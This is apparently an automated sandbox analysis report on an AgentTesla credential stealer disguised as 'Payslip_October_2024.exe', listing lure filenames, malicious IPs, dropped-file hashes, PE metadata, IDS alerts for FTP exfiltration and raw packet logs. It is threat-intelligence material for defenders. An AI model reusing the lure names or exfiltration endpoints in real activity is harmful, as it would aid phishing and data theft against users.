                                                                                                          Payslip_October_2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CLOUDFLARENETUSFW Reminder Steve Daugherty shared ALAMO1 _ AGREEMENT.paper with you.msgGet hashmaliciousUnknownBrowse
                                                                                                          • 104.16.99.29
                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                          • 104.21.5.155
                                                                                                          https://lincolnok.nimbusweb.me/share/11356312/zkr5e4o5lvh67fyvfxtwGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 1.1.1.1
                                                                                                          https://q2leem1z7of18zd8cjwcukwbzqg16yotalans8rynovtws66yyb.unimpociarp.comGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.97.3
                                                                                                          https://z7.mqis1u.com/27p3mW2jbVyhAO1WQDjPk/Get hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Office365_Alert_details Doc#(AL).htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.17.25.14
                                                                                                          afe7cvkMKi.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                          • 172.67.133.135
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                          • 104.21.5.155
                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                          • 104.21.5.155
                                                                                                          https://t.ly/UEfhCGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                          • 104.17.25.14
                                                                                                          EXABYTES-AS-APExaBytesNetworkSdnBhdMYPayslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Txwd 4063517991 djxjdlxmbk.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                          • 103.6.199.200
                                                                                                          Payslip_October_2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0ehttp://peakstone-sharepoint.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.26.12.205
                                                                                                          _Retail_Benefits_and_Commission_2024.svgGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          https://ichi-up.net/finish?experiment=END_BANNER_DIGI&url=//a2050ef0001ec97034e879d6a229c6f3.vrkad7xao5.free.hr/9484181209/75b13b249b2b8fc5625604396907f89475f7463e/finance@monroecounty.govGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                          • 104.26.12.205
                                                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                                                          • 104.26.12.205
                                                                                                          https://dontcrydesignlab.com/reports.phpGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 104.26.12.205
                                                                                                          A Wireless Caller left a recording #iE0rfKd.emlGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          0oyt0YS20b.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          vbe11TPn2x.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          att1-241104022450_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 104.26.12.205

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payslip_October_2024.exe.log

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\Payslip_October_2024.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1216
                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                          Malicious:true
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sgxIb.exe.log

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1216
                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                          C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\Payslip_October_2024.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):800256
                                                                                                          Entropy (8bit):7.728157439911338
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:hM3ZJZEkrV/BUNWGlWblcCSU+gXsT3Srkezl4VQRv7P9vZPqWeQh:eL5yWEWbl5LcT36zuVm7lvZPVh
                                                                                                          MD5:A0DADB7997E2B13144275B1C164F1C84
                                                                                                          SHA1:6F63137C9A20C05C04B53EAEA60EAE9355022A97
                                                                                                          SHA-256:7602098A6B2A95CA014488CE7C67B273A6189D7CC4DAA09FB639C32FC21AFA99
                                                                                                          SHA-512:62EFF8465B244C5550DB674C7F49E0EDDE9F127816A735D331F53CA8988631629C9BFE9366742F121FA40B45C1928E3B80B6F0077B2604F636CBF5BA38BBE4AB
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 32%
                                                                                                          Reputation:low
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(g..............0..&...........D... ...`....@.. ....................................@..................................D..O....`............................................................................... ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............4..............@..B.................D......H............n..........h...0@...........................................0............}.....(.......(......r...p.(....(....o......{.....(....o......{....r...p.(....(....o......{.....(....o......{.....(....o......{.....(....o.....*...0..`........(.........(.....o............,*....t......o....r-..p(......,...o......+..(....o ...(!.....+...*.0...........(....o"...o#...o$....+..*...0..;........(.........(.....o............,..r-..p.+....t....o%....+..*..0..;........(.....X...(....

                                                                                                          C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\Payslip_October_2024.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):26
                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                          Malicious:true
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):7.728157439911338
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          File name:Payslip_October_2024.exe
                                                                                                          File size:800'256 bytes
                                                                                                          MD5:a0dadb7997e2b13144275b1c164f1c84
                                                                                                          SHA1:6f63137c9a20c05c04b53eaea60eae9355022a97
                                                                                                          SHA256:7602098a6b2a95ca014488ce7c67b273a6189d7cc4daa09fb639c32fc21afa99
                                                                                                          SHA512:62eff8465b244c5550db674c7f49e0edde9f127816a735d331f53ca8988631629c9bfe9366742f121fa40b45c1928e3b80b6f0077b2604f636cbf5ba38bbe4ab
                                                                                                          SSDEEP:12288:hM3ZJZEkrV/BUNWGlWblcCSU+gXsT3Srkezl4VQRv7P9vZPqWeQh:eL5yWEWbl5LcT36zuVm7lvZPVh
                                                                                                          TLSH:F505DFD03B36B719DE695A74D659DDB582F11AA8B101FAE31ADC3B53388C3219E0CF42
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(g..............0..&...........D... ...`....@.. ....................................@................................

                                                                                                          File Icon

                                                                                                          Icon Hash:26ccd9ddd9dddda0

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x4c44ea
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x6728E5A9 [Mon Nov 4 15:18:01 2024 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc44980x4f.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000xba0.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x20000xc24f00xc260090e11eb56940eae5925d8612f07fcde5False0.8751444433279743data7.734734914632359IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0xc60000xba00xc00283aa62e151331db0322a689c7ae8750False0.4641927083333333data5.918595339968432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0xc80000xc0x2005377fd2afd5411ef46a5727c22edd3a8False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_ICON0xc60c80x7c3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.5123301459486663
                                                                                                          RT_GROUP_ICON0xc689c0x14data1.05
                                                                                                          RT_VERSION0xc68c00x2dadata0.4506849315068493

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          mscoree.dll_CorExeMain

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-11-04T21:25:12.909275+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449742TCP
                                                                                                          2024-11-04T21:25:13.322096+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449741110.4.45.19721TCP
                                                                                                          2024-11-04T21:25:14.233376+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449746110.4.45.19752210TCP
                                                                                                          2024-11-04T21:25:14.238674+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449746110.4.45.19752210TCP
                                                                                                          2024-11-04T21:25:22.350303+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449751110.4.45.19721TCP
                                                                                                          2024-11-04T21:25:23.295388+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449752110.4.45.19754816TCP
                                                                                                          2024-11-04T21:25:23.301069+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449752110.4.45.19754816TCP
                                                                                                          2024-11-04T21:25:52.030022+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449755TCP

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 4, 2024 21:24:55.527642012 CET49733443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:24:55.527683020 CET44349733104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:24:55.527760029 CET49733443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:24:55.533924103 CET49733443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:24:55.533937931 CET44349733104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:24:56.156689882 CET44349733104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:24:56.156786919 CET49733443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:24:56.159403086 CET49733443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:24:56.159413099 CET44349733104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:24:56.159626961 CET44349733104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:24:56.211335897 CET49733443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:24:56.214478016 CET49733443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:24:56.259335041 CET44349733104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:24:56.396697044 CET44349733104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:24:56.396761894 CET44349733104.26.12.205192.168.2.4
                                                                                                          Nov 4, 2024 21:24:56.396802902 CET49733443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:24:56.406963110 CET49733443192.168.2.4104.26.12.205
                                                                                                          Nov 4, 2024 21:24:57.172457933 CET4973421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:57.178833008 CET2149734110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:57.178906918 CET4973421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:57.181943893 CET4973421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:57.188072920 CET2149734110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:57.188191891 CET4973421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:57.209469080 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:57.214432955 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:57.214519978 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:58.145982981 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:58.149497032 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:58.154443026 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:58.498543024 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:58.498661041 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:58.503539085 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:58.877778053 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:58.877887011 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:58.883068085 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:59.228914022 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:59.229027987 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:59.235553980 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:59.579032898 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:59.579164982 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:59.584208965 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:59.928574085 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:24:59.928759098 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:24:59.933819056 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:00.277859926 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:00.280299902 CET4973849239192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:00.285224915 CET4923949738110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:00.285345078 CET4973849239192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:00.285343885 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:00.290321112 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:01.185388088 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:01.188746929 CET4973849239192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:01.188786030 CET4973849239192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:01.193861008 CET4923949738110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:01.193898916 CET4923949738110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:01.194161892 CET4923949738110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:01.196033955 CET4923949738110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:01.196085930 CET4973849239192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:01.226983070 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:01.533375978 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:01.533736944 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:01.538949013 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:01.884216070 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:01.884578943 CET4973963989192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:25:01.889532089 CET6398949739110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:25:01.889624119 CET4973963989192.168.2.4110.4.45.197
